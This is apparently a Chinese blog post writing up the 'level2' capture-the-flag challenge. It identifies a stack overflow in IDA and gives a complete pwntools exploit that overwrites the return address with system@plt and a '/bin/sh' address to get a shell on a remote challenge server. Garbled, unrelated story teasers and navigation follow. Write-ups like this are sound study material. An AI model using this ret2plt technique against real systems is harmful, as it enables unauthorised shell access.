level2

image.png

0x00 `file`和`checksec`(看不到，看不到，看不到)

image.png

0x01 ida查看

image.png

明顯的棧溢出
這個(gè)題目和之前的不一樣切省，這個(gè)里面沒有直接system('/bin/sh')之類的函數(shù)，所以需要我們構(gòu)造
ida查看字符串和左側(cè)function

image.png

image.png
所以直接調(diào)用plt_system即可

0x02 完整`exp`

from pwn import *

local=0
pc='./level2'
aslr=True
context.log_level=True
context.terminal = ["deepin-terminal","-x","sh","-c"]

libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

if local==1:
    #p = process(pc,aslr=aslr,env={'LD_PRELOAD': './libc.so.6'})
    p = process(pc,aslr=aslr)
    gdb.attach(p,'c')
else:
    remote_addr=['111.198.29.45', 58516]
    p=remote(remote_addr[0],remote_addr[1])

ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda   : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)

def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

def raddr(a=6):
    if(a==6):
        return u64(rv(a).ljust(8,'\x00'))
    else:
        return u64(rl().strip('\n').ljust(8,'\x00'))

if __name__ == '__main__':
    rl()
    plt_system_addr = 0x08048320
    bin_sh_addr = 0x0804a024
    payload = 'a'*0x88
    payload += 'bbbb'
    payload += p32(plt_system_addr)
    payload += 'fake'
    payload += p32(bin_sh_addr)
    sl(payload)
    p.interactive()

0x03 結(jié)果

image.png

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者

人面猴
序言：七十年代末，一起剝皮案震驚了整個(gè)濱河市塘揣，隨后出現(xiàn)的幾起案子，更是在濱河造成了極大的恐慌碉纳，老刑警劉巖勿负，帶你破解...
沈念sama閱讀 207,248評論 6贊 481
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件，死亡現(xiàn)場離奇詭異劳曹，居然都是意外死亡奴愉，警方通過查閱死者的電腦和手機(jī)，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 88,681評論 2贊 381
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門铁孵，熙熙樓的掌柜王于貴愁眉苦臉地迎上來锭硼，“玉大人，你說我怎么就攤上這事蜕劝√赐罚” “怎么了轰异？”我有些...
開封第一講書人閱讀 153,443評論 0贊 344
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵，是天一觀的道長暑始。經(jīng)常有香客問我搭独，道長，這世上最難降的妖魔是什么廊镜？我笑而不...
開封第一講書人閱讀 55,475評論 1贊 279
?港島之戀（遺憾婚禮）
正文為了忘掉前任牙肝，我火速辦了婚禮，結(jié)果婚禮上嗤朴，老公的妹妹穿的比我還像新娘配椭。我一直安慰自己，他們只是感情好雹姊，可當(dāng)我...
茶點(diǎn)故事閱讀 64,458評論 5贊 374
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布股缸。她就那樣靜靜地躺著，像睡著了一般吱雏。火紅的嫁衣襯著肌膚如雪敦姻。梳的紋絲不亂的頭發(fā)上，一...
開封第一講書人閱讀 49,185評論 1贊 284
城市分裂傳說
那天坎背，我揣著相機(jī)與錄音替劈，去河邊找鬼。笑死得滤，一個(gè)胖子當(dāng)著我的面吹牛陨献，可吹牛的內(nèi)容都是我干的。我是一名探鬼主播懂更，決...
沈念sama閱讀 38,451評論 3贊 401
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼眨业，長吁一口氣：“原來是場噩夢啊……” “哼！你這毒婦竟也來了沮协？” 一聲冷哼從身側(cè)響起龄捡，我...
開封第一講書人閱讀 37,112評論 0贊 261
萬榮殺人案實(shí)錄
序言：老撾萬榮一對情侶失蹤，失蹤者是張志新（化名）和其女友劉穎慷暂，沒想到半個(gè)月后聘殖，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體，經(jīng)...
沈念sama閱讀 43,609評論 1贊 300
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡行瑞，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 36,083評論 2贊 325
?白月光啟示錄
正文我和宋清朗相戀三年奸腺，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片血久。...
茶點(diǎn)故事閱讀 38,163評論 1贊 334
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡突照，死狀恐怖，靈堂內(nèi)的尸體忽然破棺而出氧吐，到底是詐尸還是另有隱情讹蘑，我是刑警寧澤末盔，帶...
沈念sama閱讀 33,803評論 4贊 323
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布，位于F島的核電站座慰，受9級特大地震影響陨舱，放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜版仔，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 39,357評論 3贊 307
男人毒藥：我在死后第九天來索命
文/蒙蒙一隅忿、第九天我趴在偏房一處隱蔽的房頂上張望。院中可真熱鬧邦尊，春花似錦、人聲如沸优烧。這莊子的主人今日做“春日...
開封第一講書人閱讀 30,357評論 0贊 19
一樁弒父案，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽畦娄。三九已至又沾，卻和暖如春，著一層夾襖步出監(jiān)牢的瞬間熙卡，已是汗流浹背杖刷。一陣腳步聲響...
開封第一講書人閱讀 31,590評論 1贊 261
情欲美人皮
我被黑心中介騙來泰國打工，沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留驳癌，地道東北人滑燃。一個(gè)月前我還...
沈念sama閱讀 45,636評論 2贊 355
代替公主和親
正文我出身青樓，卻偏偏與公主長得像颓鲜，于是被迫代替她去往敵國和親表窘。傳聞我的和親對象是個(gè)殘疾皇子，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 42,925評論 2贊 344

level2

0x00 file和checksec(看不到，看不到，看不到)

0x01 ida查看

0x02 完整exp

0x03 結(jié)果

推薦閱讀更多精彩內(nèi)容

0x00 `file`和`checksec`(看不到，看不到，看不到)

0x02 完整`exp`